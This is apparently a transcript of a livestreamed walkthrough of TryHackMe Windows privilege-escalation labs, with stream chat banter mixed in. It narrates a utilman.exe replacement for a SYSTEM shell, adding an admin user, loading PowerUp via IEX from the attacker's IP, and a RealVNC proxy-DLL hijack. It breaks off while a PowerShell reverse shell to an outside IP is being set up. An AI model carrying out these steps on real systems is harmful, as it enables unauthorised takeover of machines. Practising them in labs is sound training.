Alright, welcome back to Windows Privilege Escalation Part 2. And we're going to be trying to do some of the things that are in here now. Whoa! Whoa, what is this? There we go, sorry about that. Alright, welcome back. So, let's go ahead and take a look at opening PowerShell back up again. I've obviously already remned in and everything. Got my remnant in there, so I already peed into this guy. And yeah, we're going to take a look at, I believe it was... view or SE backup and restore, right? Nope, we already did that one. Did that. SE take ownership. There we go. So I actually logged in as the incorrect guy. That's okay though, because we can open another PowerShell instance as an administrator and then put his credentials in. So we'll right click, run as administrator. We'll put his credentials in as the administrator, and then we'll be that guy. So more choices. We go ahead and pick. Maybe I can't. I should be able to open up as a different user though. THM take ownership. Alright, maybe it's a totally different thing here. So let's go ahead and exit out of here. We'll get right back into that guy again. And I didn't realize that the password changed at this point. Through THM take ownership and the world is mine 2022. Say okay. And let's hop into this guy now. Get at least the correct portion of this. And we're going to open it up and we're going to run as administrator. The beginning of this part is just getting you to be able to actually change something to be able to take ownership like that. Don't think that lower privilege user is going to be able to do that. Don't be like, oh, I can just do this. All right, we are running it as an administrator for a reason. Alright, so we run as administrator. I command prompt, check our privileges, okay? If I do a who am I / priv, we're going to see, at least we should see, that we are not part of the take ownership of files or other objects. But we're going to utilize util-man, so utility management. Alright, we're going to utilize that to be able to take ownership of it, which runs as system privileges. So, like I said, don't think that you'll be able to get out of the box as a lower priv user and just kind of hop on here and just do this and just be an admin every single time. All right. Usually that's not how it works. Okay. This is just to show you what you can do with take ownership. So let's do a who am I / priv again. And take ownership is actually still false. Oh, I took ownership of util-man. That's why. But now I don't actually still have that privilege set. I just took ownership of that one file, like right there. So let's go ahead and do a Control-Shift print screen. We'll do this like right here. But yeah, you have to have the rights to be able to do that. So I just don't want people hopping out of Windows box, immediately doing that. And be like, that didn't work. Well, yeah, because you need the rights to be able to do it. Okay. And then we're also going to do an ICACLs, okay, for util-man, and we're going to take full ownership of it, right? We're going to be able to do everything we want with it. Okay, there we go. Failed processing 0 files. Successfully processed 1 file. Okay, failed processing 0 files. Okay. So we now have full ownership of that. Awesome, easy day. All right. Can we do an ICACLs and see if we actually have it? Can we do that? ICACLs, and then can we say util-man.exe? Can we do something like that? Yep, we can. So we see like right here, THM take ownership has full privileges. All right, easy day, right? So we took ownership of that. That runs as NT system authority within a Windows environment. So now after this, we replace the util-man.exe with a copy of command.exe. So we should be able to actually just run command.exe and will be util-man.exe. I wonder, can we do sticky keys on this thing? Let's see here. That's my sticky keys. Oh, we can. Want to try to replace it with sticky keys? Let's try to replace it with sticky keys like real quick and see if we can do something like that. That would be sethc. So let's go ahead and copy. We already are in the system32 folder. So let's copy command or sethc.exe to util-man .exe. Now let's try to hit shift 5 times, see what happens. Nothing. Okay. Probably because I just copied C to that, huh? Let's go ahead and copy. Let's go ahead and rename. Let's try this. Copy util-man, utility management, back to setHC. Back to setHC. Oh my god, there's a lot of stuff in here. I didn't realize that. Okay. No, we can't. Okay, let's go ahead and copy command.exe. We might have to reset this box to util.exe. Okay. So we did that. To trigger utility man, we will lock our screen from the start button. If I proceed to click ease of access button, which runs util-man.exe. So yeah, we should be able to do that in honesty with stick keys. But let's go ahead and lock our screen. Lock the screen, right? And then click on ease of access. And sure enough, it opened up this guy right here. So I wonder. Okay, just want to see. So who am I /priv, or who am I? We have a lot more privileges, you can see, and I have NT authority system, so I can do whatever I want on this machine, like net user Ryan, password /add. Okay, add him in there. Net local group administrators /add Ryan. All right, and we just keep going like this, right? We just keep doing stuff like that. And let me go ahead and actually get a print screen of what we did before. I forgot what the password was. Something about 2022. The world is mine 2022. Okay, we'll open back up this PowerShell, and I just want to show that, hey, we copied command.exe to be utility. Command.exe. May not be able to do it with sticky keys. Oh, we should be able to do it with. Well, no, because if we did it with sticky keys, we would just have to open up command prompt, huh? So we probably won't actually be able to do that with sticky keys, like right there. Because we would have to somehow open up ease of management. And then we'd have to somehow have one go to the other, to finally become command.exe. So that's a much easier way of doing it. Like right down there. Okay. Now we go to the lock screen, right? Get there. Print screen that guy. Lock the computer. Alright, so we locked it, and then we went to ease of management. And we got here. And there we go. Easy day for that guy. Right. There we are. That is SE take ownership. All right. Grant the permissions and everything. So SE impersonate. This one has been around for like a little bit now. And I've shown this one before on the channel. So let's go ahead and do it again. So a website running on IIS that we plan a web shell, following address. We use the web shell to check for assigned privileges of compromised account and confirm we hold both privileges of interest for the task. SE assigned primary token privilege, okay, and SE impersonate privilege. So SE impersonate privilege is really what we're looking for there. And we're going to use Rogue Potato to be able to do this. I wonder if we're using the PS1 file. So he does not have the PS1 file on there. Let's see here. Rogue Potato PS1. Or we used Hot Potato PS1 last time, didn't we? So he's calling for Netcat to come back to him. Now remember, you can download Netcat's binary, right? So, but he's saying, because we don't have either of those privileges as this user. Are we? Oh, we don't actually do it on this machine. Oh, we do. Okay. Use any of the three methods discussed in this task. Gain access to the administrator's desktop. Click the flag. Okay. So we do not have that privilege on us like right now. I mean, we could. Okay, we do have it if we're already NC System Authority, which means we're already an administrator. So we're already the top dog. So who cares? So I have shown this one on the channel before, though, the impersonate privilege. So we're just going to go ahead and we're just going to go into the administrator's desktop from over here. See users administrator desktop. And we'll type out that flag.txt. There we go. Ooh. Self AG privilege. Self privilege. Privilegee. Privilegee. SELF AG privilege. Did I put a space in here? THM SELF AG PRIVILEGE. PRIVILEGE. What? Oh, SEFL. Flag, not self. SEFL. SEFL. There we go. Okay. Let's go ahead and look at abusing vulnerable software. What are we going to do with this guy? So do we have to, okay, we do. We got to get back into THM unprivileged and password 321. So let's go ahead and log back in as him. So we'll do a disconnect from there. THM unpriv and password 321. Oh, what's up? Yeah, it's not Seth. Yeah, I noticed that. It's Seth, not self. I was like, what is going on here? I was so confused for a second. THM unpriv, password 321. Do we have to start from another machine? We do. Okay. I'll say, wait a minute. Now we're really lost. Password's not working anymore. Now we're super lost. Okay. Okay, let's start up this machine. I'll let him start up, and looks like we're gonna do some DLL stuff in here. I did show DLL stuff on the last two. What is it? Privilege escalation for Windows things that I did. So I have shown DLL on both of those. I also showed you guys how to find if it has a DLL problem, right? So we utilized. I forgot what the heck I utilized, what the heck it's called. The system tools there to be able to actually look at DLL problems and things like that and actually return back something to us. Looks like we have pretty much the same exact programming. I'm going to try to do command prompt in here for a DLL. And yeah, because this guy's doing a who am I, right? So we have the same that kind of stuff, and then we obviously have to compile it and everything, right? So, and then send it over to him, right? Give this guy another minute or two to start up. Damn, Chad B. Noob. Nice gift. It's awesome. Yeah, that's the only coolest thing I can do for that. All right. So let's go ahead and grab this IP address. Hop back over into Remin over here. Yes, THM tac unpriv password 321 with a capital P. And it looks like it's started up and everything. That's good. Give that guy a second. Go through and do this DLL hijacking like right here. This is some actually. Oh, a regular DLL, the export table contains pointers to functions containing the same DLL. Proxy DLL's export table will have forwarders pointing to functions on a different DLL. I never looked that deep into DLLs. That's something new for me, like right there. Yeah, this one is a little more hardcore with DLL hijack than what we did before, it looks like. Proxy DLL to ADS LDPC DLL. This is a much more hardcore DLL than what we've done before, so this will be fun. Yeah, you like that one? The hash on that thing is also a real hash. It's not part of the test, don't worry about that. But from Certified Red Team Professional, during the course, the hash is a real hash from that course. So, if anybody cracks it, I mean, I don't have anything to give you. I'll give you a thumbs up if anyone cracks that hash. It's a pretty long one. I think it's that one that's like super long and hard. But, well, I guess if you went through the course, then you already have a word list for that. Alright, so let's go ahead and do we have to run this as administrator here? Go ahead and see what's happening here. I feel like we wouldn't have to run it as administrator because we're trying to elevate our privileges. So we'll just open up PowerShell here. Let's go ahead and see what we have. Do we have a tools directory on here? We don't have one in the desktop. I noticed that. Okay, nothing in here. So I'm not seeing any type of tools directory or anything like that. Let's load up first. Let's see if we can load up something first. Let's try to do a come back over to my screen over here. Okay, clear it out. Let's cd into desktop try hack me Windows privesc, and I do have power up in here. So let's go ahead and do a Python 3 tac-m HTTP server on port 80. Right, I already have it running. Never mind, I'm an asshole. Probably had it running from who knows how long ago. I have so much stuff open. Sorry, I don't know what's even over here. I'm a interpreter session. As you can see, I just kind of just went to bed last night. All right, let's go ahead and do a IEX IWR HTTP 10.13.26.184. Right, that's my tunnel IP address. That's powerup.ps1. Remember, as usual, since we're going to a Linux machine, it is case sensitive. If it comes back with Internet Explorer is not working in the beginning, do a tac use basic parsing like right there. Remember, ours is already running because by cat powerup.ps1 over here, we see that I have an invoke all checks at the very end, so I don't have to actually type it in. It just automatically runs it as soon as it finds it. So it's not seeing, it looks like, oh, hijackable DLLs. So we do have, it's saying, THM on boom, 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 app data, local motion. I think this one's always hijackable though. I think that one won't get us anywhere. We'll just be the same user. So we're not seeing much in there, right? So now it's time to start looking at the software that's on the system and everything, right? So, I mean, we could just open up. We see real VNC like right here. You can always right click on it. More, open file location maybe. We could just try to find it, right? Because it's going to open it up in probably the start menu programs. Yep. Just go ahead and go to C drive. Probably in program files, x86 I would think. And we'll look for VNC in here. What was the program actually called? Real VNC? Okay, so it's not in there. Let's try program files. Let's try to figure out, there we go, real VNC, VNC server. And let's go ahead and look to see if we can find this properties. Trying to see if I can find the 6.0.8, the version of it. So we have version 6.0.8. So we could always look that up, right? Could always do a little VNC 6.0.8, I believe it was. Exploits. That's what it was, right? 6.8.0, sorry, 6.8.0 exploits. And we do see this privilege escalation, real VNC security vulnerabilities. So not too much in here. But we do see somebody is trying to do some type of privilege escalation. CVE 2022-27502. So we can always look that up, right? Start to search for this different stuff to see what we get. We could also try to look it up on, maybe look it up on, what is it, search plate maybe? Nope, search plate doesn't have anything for it yet. Okay. So I was just about to make sure I spelled real VNC correctly. So search plate doesn't have anything for it yet, or mine's not updated, one of two. But somebody was trying to, there is some type of CVE out there for this one, it looks like. For 6.0.8, it might be all the way up till 6.9.0 through 5.1.0, allows local privilege escalation. Here we go. So, allows local privilege escalation because of installer, repair, operation, executes temp file as system. Okay? Base score is 7.8 high. So now he's got to try to figure out how to actually exploit this guy, right? But we're using a DLL hijacking for this one, like right here. So we have an application you can link. So okay, let's see here. The target server is running VNC 6.8, which has been found vulnerable to the privilege escalation via DLL hijacking by Trisket Labs. Okay, and this is the one that we actually clicked on in the beginning. So you create file in temp, name not found. There you go. There's our. Well, that's an exe file like right there. We just need a DLL file now. So I'm wondering like right where that AL doesn't seem to have the DLLs over here. It just seems to have all the executables over here. There we go. ALSLDPC.dll for VNC server old.exe with a name not found. We also look like we have active eds.dll. Which is name not found, so we might be able to do something with that. But what is the purpose of your visit today? To hack stuff. All right. So let's see what we're going to do with this guy over here. So we need to do some type of DLL hijacking for that DLL, like right there. So since we have write access to our temp folder, we create a malicious DLL called alsdpc.dll on the application directory according to DLL search order, as the application directory has precedence over C Windows System 32. So that means that as it tries to search for that DLL, it's going to search in that temp directory before it searches in C Windows System 32. We may actually be able to see that whenever we go to the website that we were just on. We can actually see that it's looking in the temp directory. C users low priv app data local temp dot whatever. Okay. So it is looking in that temp directory, all right? And he actually put his one in System 32, which means that we get to that temp directory, not find it, keep going, and go to System 32. But he obviously has some type of write access within System 32. We most likely do not. So we're going to have to put in that temp directory, which does get looked at before the System 32 directory, according to our, our notes here. So let me go ahead and actually. Well, I'm not going to take notes of this one just because I'll take the notes that I did, but I'm not going to take regular notes just because who knows when I'm going to see VNC, real VNC 6.8.0 again. All that remains is building a custom DLL, injecting our desired payload into there. Okay, so let's go ahead and create a proxy DLL. We'll need to create two files. Can we just create just a regular DLL, just increase our privileges? I feel like we could. Let's go ahead and do a proxy DLL. We have not done one of those yet. Okay, we'll start it off with a who am I, something easy, right? So let's go ahead and name this guy, like right here is going to be proxy.c. To create a proxy DLL, we need to create two files, proxy.c, standard C implementation of a DLL. The only method implemented will be the DLL main function containing our payload. So our payload, like right here, system, and then that's our payload is who am I, right? And we'll just try it out with this first and do like maybe like a proof of concept or something like that. So go ahead and nano, and it was called proxy.c. There we go. All right, let me go ahead and do a I'm over here. Okay, we will do a DLL hijack proxy hijack. So what I've learned with the proxy hijack is that the DLL is going to then look for another DLL. So it's going to kind of run two DLLs on it and look for a different one there. Okay, there we go. So that's what's going to be happy with the proxy DLL, like right there. Let me actually go ahead and grab this guy right here. And I'll get that. We need to create two files also. So I can see why later on, I can see why did I create two files. And I'll know why. So one DLL is going to call for another one. That's pretty cool. Okay. Let's continue on our way down here. Proxy.def, a definition file to pass the linker where we will specify all the export forwards back to the original DLL. Okay. The structure of the file will hold a line for each export where we will indicate the name of the export, followed by the DLL and method name where the calls will be forwarded, followed by an ordinal that specifies in which position of the export table will the method be. So it looks like method 1, C Windows System 32, original DLL.method1 at 1. Do we need to create that file like right there? Kind of confused on that part. Not gonna lie. To extract the names of all recorded exports on the original DLL and create a def file with all the forwards needed. Modified scripts code is the following. All right. Target DLL. Add argument to target. Required equals true. String help target. Original path required true. Print exports. For export in DLL directory. If export name, print export name decode original path. Copy the code into a file and get exports.py. Then we'll use it with the tac target parameter points to the original DLL, and the original path parameter indicates where the original DLL resides in the target machine. Ah, okay. Okay. I think I'm understanding this. Let's copy the original DLL to our attacker machine using impact. Okay, let's see if the DLL is in there. So I feel like that DLL is not there. Well, it does look at temp before it looks at that guy, so DLL might be there, it's just not in temp. Let's go ahead and find out. C Windows System 32. And let's just totally jack up my screen. Should be able to stop it, scroll up and see. And we are looking for ADS-LDPC. ADS, so scroll down like a little bit. Okay, so it's right there. So we do have it. So we do have that one. Okay. Let's go ahead and do that SMB server and get that file over to us. We already have the shared directory and everything, so we don't need to worry about that. And we'll go ahead and we'll copy that guy over to us, right? And let me go ahead and copy the Python script that they made, like right here. And then since that's already copied, I'm just going to do a quick CD into share. And we'll do a quick nano, what was it called? It was exploit get exports.py. Get exports.py, they want us to name it. There we go. Okay, now let's go ahead and also run that SMB for, I have to actually look it up. Python, damn, it's on secret dump. Let's go ahead and locate SMB server.py. Okay, and I noticed that the 3.9 ones weren't really working very well for me, but the 2.7 ones were. So let's go ahead and do Python 3. Okay, maybe I just did regular Python with it, because I did this just the other day, so I'm surprised that nothing else is popping up here. Okay, so there, server.py. The username, the SMB2 support, the username, THM unprivileged, password, pass321, public share. Remember, we made that share. This will create a share named public, point to the share directory. So we're going to create a share that's called public, and it's going to point to the share directory, which is right here, which we made on our root, right, within root, like right there. And as you can see, we now have this like right here, okay? Now what we need to do is we need to actually send that file back over to us from the Windows machine as such. Whoops, I just copied that again by accident. And we'll go ahead and paste that in there, but we're going to change, see how it's public, because public is connected to the share one. Public goes to the share folder. We do 10.13.26.184. All right, hit enter, and we should be able to see, yep, sure enough, he sends across his net NTLM hash, which we already know is password, so that's not a big deal. We see that he sends that across, and we get a file, right? We'll do this like right here. We'll paste him up here. And then we will show the rest of it. We'll show this part over here. I mean, we got a file, so I don't know what the heck it's talking about. Connecting, share, IPC. We did not get the file. Why were we not able to get that file? Wonder what happened there. It looks like we got it. Let's successfully connecting share one public, but it's not actually receiving the file for some reason. Let me see how we did it before. So we did this before with, it wasn't take ownership, abusing privileges? I believe we did this with abusing privileges. Yeah, we did the system save and everything. Boom. Okay, so let's go ahead and actually back out of this guy right here. Let's go ahead and CD back, and then type in that same command again. I may not be able to be in the share folder as I do it. That might be the problem, like right there. Might be. I hope that that's the problem. How about that? Rose Redemption, how you doing? It's been a minute since I've done it at this time. Things like that. So it looks like he copied it over that time. There we go. Okay. Let's go. So we should have something in it now. Connect to share one public, disconnect to share one public. So hopefully we have something in there now. So we go ahead and show this like right here. I'm in the root directory. And put a little note for myself. Whoopsie daisy. Whoa, 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 whoa. There we go. Okay. Notice I am in the root directory, or in the home directory, really at home. Okay. And then from there, we went ahead and did this. Okay. And then we received all of this. All right. What do you think of the PMPT exam? I think the PMPT exam, I haven't taken it yet. I plan on taking it in July. I've taken some of the training. A lot of it, if you are already, if you already do this a lot, if you're doing a lot of the, a lot of CTF, stuff like that, you'll definitely, whoa, oh, okay. If you already done a lot of CTF, stuff like that, GoPro Slow Yo, what's up? Then a lot of the information that you see is going to be like, okay, it's going to be good reminders. It's going to be good, practice, hands-on keyboard, stuff like that. I did actually learn a few things while going through the Windows Privesc, his Windows Privesc stuff, which is this from here down was the PMPT stuff that Heath Adams made on Try Hack Me, and he also did a Linux privilege escalation one that he made. So I did go through all this stuff. I mean, you kind of look at it like no root squash. We've done those before. Store passwords, kernel exploits, bash history. We found you kind of look through it, but there's a couple things in here that I was like, I've never done that before. Like DLL hijacking, I've done that before, but I've never done it with making, with actually. Oh, you almost finished Holo? Is the final exploit working for you? Are you on like right now? If you are, I apologize for now that you know. But is the final exploit working for you? But yeah, like we're about to do it in here too. We're about to compile a DLL, which I've never done that before. You just use PowerUp, copy and paste what PowerUp has, and you get in. So doing things like that's been a little bit different. Learned a lot with that stuff. But yeah, I mean, everybody says it's amazing, and they are correct. It is an amazing course. It is a lot of fun. I have to do more within open source intelligence. I want to do more of that before I actually take the test, because I've heard that people have gotten stuck on that part for like a day or two just on that. So I want to do more with that, and I really feel like it's going to be coming down like tools, like the harvester, maybe looking at Dig, things like that, and then probably like looking at either Twitter or LinkedIn and trying to find like usernames or something like that. I feel like it's going to be something along those lines, but we'll see. No, I'm not sure. I was stuck on that stupid cavity mover task thing. I'm opening it until I'm reading. Okay, so for the cavity mover part, cavity mover does not work because you cannot restart the service. That's a DLL hijack. Look at there, actually cavity mover is. But it doesn't work because you cannot restart the service. So since you can't restart the service, what I did was I created a Metasploit, MSF Venom exploit, brought it back to myself. I think I just created a reverse TCP with that one or whatever. And then I changed it. I did a shell to interpreter, got an interpreter shell on there. Now remember when you're doing, and then I did a local exploit suggester. And then one of those will work in there. I'm not going to tell you which one because there's like 7 or 8 of them. But one of those do work. So that's the way you're going to be able to have to get in that box. Cavity mover will not work. You can't restart service. Even when you restart the box, it doesn't start up immediately. So, okay. So you did, okay, cool. So you did get in there. So the NTLM relay part, that part like right there, it did not work for me. I talked to other people. It did not work for them. But if you look at videos from the box, very first came out, it works just fine. I actually looked at a walkthrough of it during the box, because I'm like, what the heck am I doing wrong? And I was doing it the exact same way. SMB server was on and responder.com, so it wasn't anything like, oh, you didn't have SMB server on. It just never came through. So, and then there's another one, which is funny. Same exact thing. And I was watching a streamer do it, and he never got it either on another box. I forget which box that was. It's one of the Windows privileged boxes, I think. But yeah, he never got it to work. I then went through it, and it never worked also. So, whenever you have to do some type of, the SMB stuff in there, sometimes it will not work. So yeah, what I ended up doing, there's no other way to get into it that I could figure out. So we couldn't pass the hash because we didn't have any other hashes. We couldn't do anything like that. So what I ended up finally doing was I actually just looked up a walkthrough, and the walkthrough had a print screen of the hash dump, of one of the hash dumps or whatever. he had. I think it was a hash dump they had. I ended up copying, like typing in the hash, and then using Mimikatz to do a pass the hash, and open up another PowerShell, which then allowed me obviously to be able to talk to the domain controller, and then I made a session with the domain controller and finally got into it. That's how I had to do it. I know that's a bullshit way, yeah. So I did it like that. I know that, oh, well, that's cheating, but at the same time, though, what it actually wants you to do doesn't work, and there was no other way that at least I could figure out. Maybe you could figure out something to be able to get into it. I tried on it for hours, too, to be able to figure out another way to not have to use this hash that I found on the internet. But that's just the way it is, I guess. So we have this ADS LDC PC DLL over here now, right? Let me go ahead and show that we have him in here. I did show that I actually, yep, okay, that's all I showed. Let's go ahead and do that like real quick. Show that he is in share now. And we'll go ahead and throw that in my notes. But yeah, copy the hash wasn't too bad because I only needed the, the NT portion of it. I think I actually ended up copying the whole thing though. So I always like to do the whole thing just in case it doesn't work. I know that that's not smart. It'll work. But hey, that's just how I do it. So let's go ahead and run this exports.py. Okay. The target is going to be ADLS dpc.dll, and then the original path of it, which was C Windows System 32, which we did find, and we're going to put that into a file called proxy.def. Let's make sure that worked. We do have a proxy.def. It does have stuff in there. Okay. Go ahead and copy that. We'll throw that over into here. All right. From here, what we're going to do is we already have a compiler installed, so we're good on that, right? And now we have to compile our DLL with the following commands. Okay, so we have to compile the DLL now. Let me go ahead and I'm actually take a copy of this, like right here. I'm going to throw that over to my notes, just in case if, it's in the same spot or whatever else. We're doing the PMPT live stuff for the next 25. I'm going to be on deployment within those 25 weeks. I'm going to leave. So I want to. I really want to. But yeah, I'm going to be gone. My family left over the summer to be able to, to be able to go back to America. So they're gone like right now. That's actually why I'm streaming at this time because everyone's gone. I'm bored, super bored. When you have two kids running around the house all day and your wife and, you're always out doing stuff and things like that. When they leave, it's boring. So if you're getting frustrated with the kids, just let it be, man, because it is boring whenever they leave. I'll tell you that much. Or if you get older and you have a family, stuff like that, you start getting frustrated, just get over it. Because when they leave, this is miserable. But, yeah, so I'm going to be leaving. And on the deployment that I'm going on, we will not have internet. So, I'm not just going to be able to log on and just do it. If we do have internet, it's going to be slower than fucking dial-up. So, I mean, it's whatever. All right. So now we made this proxy.def like right here, right? So now what we're going to do, it looks like, is we're going to compile. Then we compile our DLL with the following commands. What is this like right here? What is this pulling from? Equals Intel. Let me just try that real quick. I don't know where that's pulling from. Yeah, no such file. Yeah. So I feel like we need to. Now, to finally create the proxy DLL, we will compile the proxy.c file, but we don't have a proxy.c file. Were we supposed to make a proxy.c file? Do I have a proxy.c file sitting in my... I think I made that. I did make that, didn't I? Desktop, try hack me, Windows Privesk. I have my proxy.c file like right here, don't I? All right, so now let's go ahead and copy proxy.c right here. Remember, I did make that file. And then we'll go ahead and we'll do that same thing again. unrecognized argument and option tech MASM equals Intel. Oh, probably because I have that like right there. There we go. Okay. So let's go ahead and copy this whole thing over. Grab that. That's a new one for me. I've never done that before. I'm going to go ahead and actually save that command like right there. White Cyber Duck, how are you? I don't think I've ever seen you on here before. Oh, shit. Hazard with the huge freaking raid. Thank you very much. Thanks a lot. That is awesome. Thank you very much. We're not doing anything that he does. He does a lot cooler stuff than what we're doing. We're just doing some Windows Priv-esque. Wow. Graphics, how you doing? Yeah, I've been talking to you for like a little bit now. Holy, didn't even know you streamed. Oh, yeah, yeah. I actually stream a lot. I stream a lot and then I leave for 3 months and don't stream at all. And then I come back and stream again. All right. So we did that right. Let's go ahead and change over that proxy def to proxy.o and then change that out to proxy DLL. Okay. So let's go ahead and do an ls-la now. And we have our proxy DLL right there. So, and we also have our proxy.o. So we have everything that we need now to actually create this guy, create this DLL file, I feel like, and actually put it in there against that VNC viewer, right? So let's go ahead and throw that command into here also. We're not doing anything crazy in here. Nothing like what he does. So, you know, what's just happening? Chad B. Noob, Jesus, dude. Thank you very much, Chad B. Noob. Awesome. That's awesome. Give it up for everyone else. Actually, I think I have that so thing. Wait. That shout out thing. I think I do. Shout out at Chad B. Noob. Can I do that? I think I have that. Internal error. Hey, follow Chad B. Noob. Follow GoPro Slowyo. Follow all of them, alright? Follow everyone. Those guys are freaking awesome. Okay. Alright. Follow Hazard. Follow them all. They're freaking... Oh, you want to do that one? Yeah, just do just exclamation point PTH at someone's name. So, PTH at... Let me see here. I'll throw it in like real quick. PTH at Chad B. Noob. There you go. And yes, that is a real hash in there in the NTLM. Go ahead and try to crack it. Alright. I already said, hey, first person to crack it, they get a thumbs up. Alright. Thank you very much, Kenny. Come please for the follow. Thanks a lot. Testoni, thank you. Code Peak, thank you. Jesus. Owen Codes, Len Dogs, Orbital Gun, everyone that says Jesus. Thank you very much, ladies and gentlemen, for the follow. Thanks a lot. Oh, stretch, okay. I haven't been out for that long, but we can do a stretch, I guess. We can stretch it out, I guess. Alright. I was watching who was it, BH730 the other night, and he had to do burpees, push-ups, and squats. And I decided, you know, dude, I got you. I'll do it with you. Alright. So let's go ahead and put all this together now, right? So we have this, we should have this proxy DLL file now, right? There it is, proxy DLL. Alright. Thank you for, it just keeps shooting files across the screen. Thank you very much, everybody. You want to mute site, that site like right there. Thank you very much for the follows, everybody. That is freaking awesome. Alright, so we have our proxy DLL file now. Let's go ahead and get that onto the file system. Right. So now we should have to put that proxy DLL back onto it. So let's see here. Let's go ahead. We could probably just do a wget with it. We can now copy the proxy DLL file into the target machine. Feel free to use any method. Okay, let's go ahead and do a wget for it. CD into C drive. Okay, I think we have right permission for this. We'll find out here in a second. Let's go ahead and do a wget 10.13.26.184 slash proxy.dll. Go ahead and put this in the correct folder like real quick. CD into share. Make our Python server again. We'll throw that guy over into there. And I should probably do an out file. At least we know we can get to it, right? See, GoPro Studio. Okay, so access to the path. Okay, so we can't write it in there. Let's go ahead and CD into our users. GoPro Studio. I'm not like smart enough to know what all that stuff is. Like the hype train. Someone else, they dropped like hype or some of that coins in it. I don't know what that stuff is. I'm just like, thank you. But I don't know what it actually means. All right, let's go ahead and try to do that same thing again. We'll wget into here. I'm too old. All right, so we got our proxy DLL file in here now, right? Obviously, we got 200 over here. We do a dir, and we see that we have our proxy DLL file now, which we have compiled everything, put it all together. Right now, it's just running as who am I? Okay, we're not running anything really cool on there or anything like that. Hype train incoming. Orbital Gun, thank you very much for the subscription. That's freaking awesome. Thank you all very much. So what is a hype train? What is that? Someone's got to explain that to me. Jesus Christ. Like, I don't know what it actually means. Matt, USMC, thank you very much for the follow. What's your MOS? I'm also in the Marine Corps, so you know. I was a field wireman. Obviously, that job went away. And it just means that people have subbed or donated bits in a short period. Oh, okay. Oh, no USMC. Oh, Manicus Maximus. Never mind. I looked at it on top of the screen. I saw it like that. And I was like, oh, okay, cool. The dude, I was like, all right. No. Yeah, thanks. I was on I&I duty. That's like, or you teach reservists, right, at one point. So you're active duty. You go to a reserve station. You teach reservists, right? I was out there in Chicago. Awesome place also. If any of you guys are from Chicago, that place was super cool. Super awesome place. I was actually in North Chicago. Thank you very much, the Rock Cluster. All right, I was up in North Chicago. I lived in Kenosha, Wisconsin for like a little bit. Moved down to Waukegan area. But yeah, because we gotta do like when we do funerals, those are always a little bit rough. But usually a lot of funerals that we did, the people were like 90 years old. The family knew that they were going out, so it wasn't everyone's just happy that they're not living off of 8,000 pills anymore. The younger guys, obviously that one's rough. But we did that. We did, and then I got put on the color guard. That's the guy. Yeah, South Side is not fun, but that's like when I became went to the color guard, and the color guard is the guys that carry the flags and everything like that. We all switched around positions, so we could be whatever. So we did that kind of stuff, and that was a lot of fun. We did parades, the racetrack that's over there, the horse races. We did those all the time. We did like just random, the Toys for Tots events. And so we were in blues, or dressed blues, all the time. All the time. So I've heard thank you 800,000 million times. So thank you. But yeah, it is every so pretty Chicago. But yeah, awesome city, like I said. Cub Stadium, great times there. We go out to if you're from Chicago, Boys Town is around there. That was always a blast to be in. I have a wife, but I don't really care what you want to do. You can sleep with anyone you want. Does not bother me at all. But yeah, freaking, that was always fun going out to Boys Town and just going to different bars and stuff like that. Especially in blues, we never bought drinks. We would never have to buy drinks out there, so that was always an awesome time. Good old Boys Town. All right, so we got our proxy DLL here. Now we want to put that proxy DLL. We want to move him into where it's going to look first, right? So the file VNC there, 6.8.0, looks at the temp directory before it looks at system32, right? So yes, ADS LDPC is sitting in system32, but as it goes to its file system, it's looking for that DLL in the temp directory first. So like I said, we're just going to do a who am I first. All right, this is like our proof of concept. Let's go ahead and move that proxy DLL over to and call it ADLS DPC.dll, and we'll move it to our local temp directory, right? So that should be there now. So now we should be in app data local temp. We should be able to go in there, cd into app data local temp dir, and we can see that we have that like right there, that ads sldpc.dll. Now we should just have to restart the service. So search for VNC, click the modify button. Thanks a lot for the follow. Sarsec, I have talked to you before also, or I've watched you before. So that's cool. Thank you very much for the follow. Let's go ahead and I guess we're going to search for VNC and click the modify button. Okay, let's go ahead and do that. Where would that even be? That add remove programs. Let's go ahead and add. Actually, I gotta take a print screen of this real quick. Sorry about that. Let's go ahead and add remove programs. I always stream like twice a year, so that's quite an accomplishment. Oh, I did it. I got it. Yeah, I'm pretty sure I've watched you. Like, no joke. I'm pretty sure I've watched your stuff and things like that. So, thank you very much, everybody. Like I said, that's freaking awesome. Let's see here. So we got our add remove programs, right? We want to search the list for VNC, right? And we have our VNC like right here. Let's go and click on him, and we're going to go down to modify. I'm going to print screen that like right there. Yeah, this is definitely a different way of doing DLLs than what I normally do, so this is pretty cool. Learning a new way to do it. Modify. Next. And we're going to go repair, I believe it was, right? Click on repair. Okay. See, Graphics knows you too. I know who you are. Maybe we just talked before Graphics, but I feel like I know who he is. All right, we click on modify, repair. This will trigger the repair process to execute the payload in our proxy DLL. We should see a file C output.txt, which would be the who am I. And let's go ahead and try that. Let's go ahead and click repair. Repair. Validating installation. Okay, so suppose he's going to run our DLL file. Let's go ahead and actually do a dir. I don't know where it's going to put that output.txt at. We should see an output.txt. That's what our DLL was saying that we want to see, right? I wonder if it needs to fully do it. If it hasn't gotten everywhere yet. Or we look at CD real VNC maybe? Nope, not there. Okay, so we're waiting for that guy to come through, I guess. Let's go ahead and wait for that guy to come through. And hopefully we see an output with who am I know, Ace, I know. It's getting, gonna have to quit my job now, huh? Alright, so I'm not seeing output.txt in here, but I'm forgetting where we actually put that output.txt. We might have actually tried to write to the C drive. And if we did, then that's not really what we want to do. C drive. Yeah, we did. We put it to C drive, but I don't think we can write to the C drive. Okay, we got it. Dir output. Well, yeah, because it's writing as. I don't know why the heck I just typed that in. Type output.txt because it's running as NT authority system. As we see, we are NT authority system. Now we need to do that process again, and we need to send over another one, right? So let's go ahead and we're going to send over a different DLL and maybe make a reverse shell with it or something like that. We can always try like a reverse shell. So here he has nc64.exe on there. I'm wondering if we can actually make a PowerShell. I mean, yeah, why not? You know, I'm just not going to show up anymore. Actually, now I think about it. Can you stream from the brig? Is that like a thing? If you guys like watching game stream stuff like that, Ace Vito there, he streams Apex Legends. Best Apex Legends player I've ever seen. But he's not bad. Alright, let's go ahead and so Netcat's already on there. We've done Netcat binary stuff before. We put Netcat onto something. I want to try to see if we can run invoke PowerShell TCP. So let's go ahead and locate invoke PowerShell TCP. Let's see if we can do something like this. If I can spell invoke correctly. Invoke, because it's PowerShell like that, isn't it? What? Invoke PowerShell. Okay, like that. So let's go ahead and copy this over to here. Let's go ahead and do a nano invoke PowerShell TCP. Page down, and what we're going to do is we're going to say invoke PowerShell TCP. TAC reverse. TAC IP is going to be 10.13.26.184. TAC port is going to be 4444. So what this is going to do is whenever we do a invoke expression, invoke web request, it's going to come 